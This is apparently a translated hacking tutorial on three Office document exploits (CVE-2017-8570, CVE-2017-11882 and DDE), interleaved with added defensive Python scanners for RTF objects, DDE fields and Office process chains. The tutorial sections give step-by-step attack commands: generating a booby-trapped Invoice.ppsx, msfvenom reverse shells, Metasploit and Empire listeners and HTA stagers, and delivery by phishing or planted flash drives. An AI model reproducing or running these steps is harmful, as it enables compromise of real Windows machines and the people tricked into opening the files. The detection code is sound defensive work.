Incorrect handling of OLE responses (CVE-2017-8570). When an infected document is opened, the application sends a request to a remote server to retrieve the file embedded in that document. The server returns a specially crafted response that contains a malicious file.
This problem became known in April 2017, and in August another important episode took place: Cisco's analysts reported a new, related vulnerability, CVE-2017-0199. Whereas earlier attacks used Rich Text Format (RTF) documents, the new threat involved PowerPoint (.ppsx) files.
How it works
An attack using this vulnerability follows a very simple scenario: the attacker sends the victim an email with a malicious Word document and tricks them into opening the attachment. An OLE2link object is hidden inside the document. If the victim uses Protected View, the exploit will not work, but if this mode is disabled, an HTTP request is sent to the attacker's server and an HTA file disguised as RTF is downloaded.
Once the HTA file is downloaded, it is executed automatically. This triggers the exploit, and the original Word document is closed. In its place a decoy document opens, designed to lull the victim's suspicion.
The first thing we do is go to GitHub and look at the available exploits. I will use Office8570. We create the template folder and move the downloaded template.ppsx file into it.
Now run the script to generate a PPSX file with the payload:
$ python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.0.104/logo.doc
Specify the IP address (in my case it is 192.168.0.104), and the Invoice.ppsx file appears.
Next, using Metasploit, we create a payload as a shell.exe file in the /tmp directory:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f exe > /tmp/shell.exe
That is done; now we start the listener, which will wait for a connection on the port:
$ msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.104; set LPORT 4444; run"
To make everything work, we have one more thing to do: run the local server on port 80 with the following command:
$ python cve-2017-8570_toolkit.py -M exp -e http://192.168.0.104/shell.exe -l /tmp/shell.exe
The final step is to get the infected PowerPoint presentation (Invoice.ppsx) onto the victim machine. How to do that is a separate question: a phishing email, a planted flash drive, or something of that kind. When the victim opens the file, the exploit fires and we get a shell on the Windows machine.
You can watch the bug demonstration on video.
Buffer overflow in formula editor (CVE-2017-11882)
This dangerous bug, which allows code execution without any interaction with the user, existed for 17 years.
The researchers explain that the problem has to do with Microsoft Equation Editor (EQNEDT32.EXE). It would seem to be a harmless formula editor! But this file was last compiled on November 9, 2000. Of course, it does not meet modern security standards. In Office 2007 this component was replaced by a new version, but the old one was not removed – people need to open old documents, right?
Analysts found two bugs in EQNEDT32.EXE related to memory corruption (buffer overflow). Embedding malicious OLE objects that exploit these vulnerabilities into a document allows arbitrary code execution on the machine, including downloading any file from a remote server and executing it.
$ git clone https://github.com/Ridter/CVE-2017-11882
$ cd CVE-2017-11882
$ chmod +x Command109b_CVE-2017-11882.py
$ chmod +x Command43b_CVE-2017-11882.py
Now we will need another framework: Empire. We will use it to create listeners. If you are not familiar with Empire, a "listener" is simply our IP address and the port on which we will wait for the connection from the victim machine.
$ git clone https://github.com/adaptivethreat/Empire.git
Now you can start Empire and look at the available commands by typing
We enter the following commands to create a listener:
Set the initial parameters:
set Name http – the name of the HTTP listener;
set Host <ip> – the IP address the stager will connect back to;
set Port <port> – the port it will knock on;
Once everything is done, we return to the main menu with the command
Create the HTA payload with the following commands:
usestager windows/hta – select the module we need;
set Listener http – bind it to the HTTP listener;
set OutFile /tmp/hack1.hta – specify where to save the file, giving it an unremarkable name;
execute – finish generation and exit the menu.
Almost done! Now we go to /tmp and take our finished hack1.hta file from there. This is what will be run on the victim machine.
The HTA (HTML Application) format allows an HTML document to be run without a browser. Such applications are launched by mshta.exe, which uses the undocumented RunHTMLApplication function. In Windows these files have the .hta extension by default.
Since not every user would dare to run an HTA on their machine, we will wrap it in a Word document. Documents are harmless, everyone knows that!
We go back to the console and write the following:
$ python Command109b_CVE-2017-11882.py -c "mshta <link>" -o Example.rtf
Here <link> is the URL of the hack1.hta file hosted on our server.
Now the file has to be delivered to the target machine. As soon as it is opened, a connection comes back and we get access to PowerShell.
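Both RTF-based techniques above leave a fingerprint in the document itself: an \object group whose class is Equation Editor (CVE-2017-11882) or OLE2Link (CVE-2017-0199/8570), often marked \objupdate so that Word loads it the moment the file opens. The scanner below is an added example, not code from the article or from the CVE-2017-11882 repository; it walks the \object groups of an RTF, reads each object's class name and hex-encoded payload, and records why an object deserves a closer look. The RTF it inspects is constructed inline.

```python
import re
from dataclasses import dataclass, field

# Constructed sample (not from the article): an Equation Editor object and an
# OLE2Link object, both marked \objupdate, plus a plain embedded Excel sheet.
SAMPLE_RTF = (
    r"{\rtf1\ansi{\object\objemb\objupdate{\*\objclass Equation.3}"
    r"{\*\objdata 0105000002000000 0b000000 4571756174696f6e2e3300}}"
    r"{\object\objautlink\objupdate{\*\objclass OLE2Link}"
    r"{\*\objdata d0cf11e0a1b11ae1}}"
    r"{\object\objemb{\*\objclass Excel.Sheet.12}{\*\objdata d0cf11e0}}}"
)

@dataclass
class OleObject:
    objclass: str
    autoupdate: bool
    data: bytes
    reasons: list = field(default_factory=list)

def _group(text, start):
    """Return the brace-balanced RTF group that opens at text[start]."""
    depth = 0
    for i in range(start, len(text)):
        if i and text[i - 1] == "\\":
            continue  # \{ and \} are escaped literals, not group delimiters
        depth += {"{": 1, "}": -1}.get(text[i], 0)
        if depth == 0:
            return text[start:i + 1]
    return text[start:]

def scan_rtf(text):
    """Describe every \\object group: class name, auto-update flag, payload."""
    found = []
    for m in re.finditer(r"\{\\object\b", text):
        grp = _group(text, m.start())
        cls = re.search(r"\\objclass\s*([^\\{}]+)", grp)
        raw = re.search(r"\\objdata\s*([0-9a-fA-F\s]+)", grp)
        obj = OleObject(cls.group(1).strip() if cls else "",
                        "\\objupdate" in grp,
                        bytes.fromhex(raw.group(1)) if raw else b"")
        if "equation" in obj.objclass.lower():
            obj.reasons.append("Equation Editor object: handled by EQNEDT32.EXE")
        if obj.objclass.lower() == "ole2link":
            obj.reasons.append("OLE2Link: resolves a remote link when loaded")
        if obj.autoupdate:
            obj.reasons.append("\\objupdate: loaded as soon as the file opens")
        found.append(obj)
    return found
```

The decoded objdata can be handed on to an OLE parser; here the point is only that the class name and the \objupdate flag are visible without running anything.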
Exploitation of DDE (CVE-2017-11826)
On October 10, 2018, researchers from the Chinese company Qihoo 360 reported a zero-day vulnerability in Microsoft Office that was already being actively exploited by attackers, who had organized a campaign aimed at businesses. The attack was unusual in that it used neither OLE objects nor macros.
From the victim's perspective the attack looks like this: an email with an attached document arrives, we open it and see the following message.
If you press the Yes button, another message will appear.
And one more thing.
Below is the process tree that can be observed when the exploit works correctly.
How it works
This attack technique is based on a rather old Microsoft feature, Dynamic Data Exchange (DDE), which lets one Office application load data from another. For example, a table in a Word file can be updated automatically every time the file is opened, with the data pulled from an Excel file.
Usually, when DDE is triggered, the application shows the user two warnings, which can be seen in the illustration below. Experts note that the second warning, which reports an error, is not always displayed.
The main problem here is that users who often work with DDE do not pay any attention to these messages. Such warnings have already become something so familiar that they are closed without looking.
Researchers, including staff of SensePost and Cisco Talos, noted more than once that DDE is often exploited by attackers and tried to bring the problem to Microsoft's attention, but Microsoft long refused to recognize it as a vulnerability, until it finally released the ADV170021 patch closing the hole.
Strictly speaking, the ability to exploit DDE for attacks is not a vulnerability in the usual sense of the word: Office honestly warns the user about the potential danger. The situation is much like the problems with macros and OLE.
Meanwhile, DDE attacks are used by serious hacker groups, in particular FIN7, known for large-scale attacks on financial organizations. The patch prevents this, but it is still far from being installed everywhere.
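Word stores a link of the kind described above as a DDE or DDEAUTO field in word/document.xml, so a defender can find such documents before a user ever sees the warnings. The scanner below is an added example, not part of the article: it unpacks a .docx, joins each field's instruction runs (Word can split one instruction over several runs) and reports which application every DDE field would start. The .docx it inspects is constructed in memory, and EXAMPLE_APP.EXE is a placeholder application name.

```python
import io
import re
import zipfile

# Field codes live in word/document.xml as complex fields (fldChar begin,
# instrText runs, fldChar separate/end) or simple fields (<w:fldSimple>).
TOKEN = re.compile(
    r'<w:fldChar[^>]*w:fldCharType="(begin|separate|end)"[^>]*/?>'
    r'|<w:instrText[^>]*>(.*?)</w:instrText>'
    r'|<w:fldSimple[^>]*w:instr="([^"]*)"', re.S)
DDE_HEAD = re.compile(r'^(DDE|DDEAUTO)\s+("[^"]*"|\S+)', re.I)
# Constructed document.xml (not from a real Word file): a DDEAUTO field split
# over two runs, a DDE field pointing at Excel, and a harmless DATE field.
SAMPLE_XML = (
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body>'
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText> DDE</w:instrText></w:r>'
    '<w:r><w:instrText>AUTO EXAMPLE_APP.EXE "example topic" </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText> DDE Excel '
    'C:\\reports\\q1.xlsx Sheet1!R1C1 </w:instrText></w:r><w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
    '<w:p><w:fldSimple w:instr=" DATE \\@ MMMM "><w:r><w:t>October</w:t></w:r></w:fldSimple></w:p>'
    '</w:body></w:document>')

def field_codes(document_xml):
    """Every field instruction in the body, runs joined, whitespace normalised."""
    codes, buf, inside = [], [], False
    for m in TOKEN.finditer(document_xml):
        kind, instr, simple = m.groups()
        if kind == "begin":
            buf, inside = [], True
        elif kind in ("separate", "end") and inside:
            codes.append("".join(buf))
            inside = False
        elif instr is not None and inside:
            buf.append(instr)
        elif simple is not None:
            codes.append(simple)
    return [" ".join(c.split()) for c in codes]

def find_dde_fields(docx_bytes):
    """A .docx is a zip archive; list DDE/DDEAUTO fields in its main part."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        xml = z.read("word/document.xml").decode("utf-8", "replace")
    hits = []
    for code in field_codes(xml):
        m = DDE_HEAD.match(code)
        if m:
            hits.append({"application": m.group(2).strip('"'), "code": code})
    return hits

def make_sample_docx():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", SAMPLE_XML)
    return buf.getvalue()
```

Any application other than the Office programs a document legitimately links to (Excel in the page's own example) is worth a look; the field is the only place the launched program is named.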
How to re-enable DDE
In fact, the patch only makes minor registry changes and disables DDE by default. To turn the feature back on, you just need to change the value of one key:
The value of this DWORD may be one of the following:
AllowDDE (DWORD) = 0 – disables DDE. Once the update is installed, this is the default;
AllowDDE (DWORD) = 1 – allows DDE requests to programs that are already running but does not allow new programs to be launched;
AllowDDE (DWORD) = 2 – allows any requests.
Let's see how to get an active session on a remote host (Windows 8.1, Windows 7, Windows Server 2008). For this we use a Python script that generates an RTF file; everything needed is included in the Metasploit Framework.
The corresponding module creates a malicious RTF: if it is opened in a vulnerable version of Word, the code is executed. The vulnerability is that an OLE object can make an HTTP(S) request and execute the HTA code returned in the response.
Let’s get started.
> use exploit/windows/fileformat/office_word_hta
> set srvhost 192.168.0.106
> set payload windows/meterpreter/reverse_tcp
> set filename order.doc
> set lhost 192.168.0.106
The link highlighted in red must be delivered to the target host.
If you follow it and run the downloaded file, an active session will open. Run sysinfo to confirm the win.
We have examined three serious vulnerabilities that are actively exploited in the wild. All three bugs are to some extent covered by patches and have their limitations, but old versions of Office are so common that these vulnerabilities will remain relevant for a long time.
Remember: updates are not a whim of Microsoft; patches are one of the mandatory conditions of security. But not the only one. Months sometimes pass between the discovery of a problem and its fix, so even if you update promptly, there is always a chance of coming across a document with a surprise.
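Each of the three chains above leaves a recognisable parent/child pattern in process telemetry: Word or PowerPoint starting mshta.exe, EQNEDT32.EXE starting anything at all, or an Office process ending up with cmd.exe or powershell.exe somewhere below it. The detector below is an added example, not from the article, run over constructed process-creation events; it assumes only a pid, a parent pid and an image name per event, which any endpoint log of process creation provides.

```python
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image")
# Office hosts whose descendants deserve scrutiny, and the script/shell hosts
# the three techniques end up launching (mshta.exe for the HTA payloads,
# cmd.exe/powershell.exe via DDE or an Empire stager).
OFFICE = {"winword.exe", "powerpnt.exe", "excel.exe"}
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe"}
# Constructed process-creation events (not real telemetry). EQNEDT32.EXE is
# started out of process through COM, so its parent is svchost.exe rather than
# Word; the rule therefore keys on EQNEDT32.EXE itself, not on its parent.
SAMPLE_EVENTS = [
    Event(600, 1, "services.exe"),
    Event(700, 600, "svchost.exe"),
    Event(1000, 1, "explorer.exe"),
    Event(2000, 1000, "WINWORD.EXE"),
    Event(2100, 700, "EQNEDT32.EXE"),
    Event(2200, 2100, "cmd.exe"),
    Event(2300, 2000, "mshta.exe"),
    Event(2400, 2000, "splwow64.exe"),   # benign print helper Word starts itself
    Event(2500, 2200, "powershell.exe"),
]

def lineage(events, pid):
    """Image names from the given process up to the root, lower-cased."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # seen guards against pid cycles
        seen.add(pid)
        chain.append(by_pid[pid].image.lower())
        pid = by_pid[pid].ppid
    return chain

def alerts(events):
    """Flag processes whose ancestry matches one of the article's attack chains."""
    out = []
    for e in events:
        me, *ancestors = lineage(events, e.pid)
        if "eqnedt32.exe" in ancestors:
            out.append((e.pid, e.image, "descendant of EQNEDT32.EXE, which has no reason to spawn processes"))
        elif me in SCRIPT_HOSTS and OFFICE & set(ancestors):
            out.append((e.pid, e.image, "script/shell host started from an Office document"))
    return out
```

Walking the whole ancestry rather than checking only the direct parent is what catches the powershell.exe started two levels below EQNEDT32.EXE while leaving Word's own helper process alone.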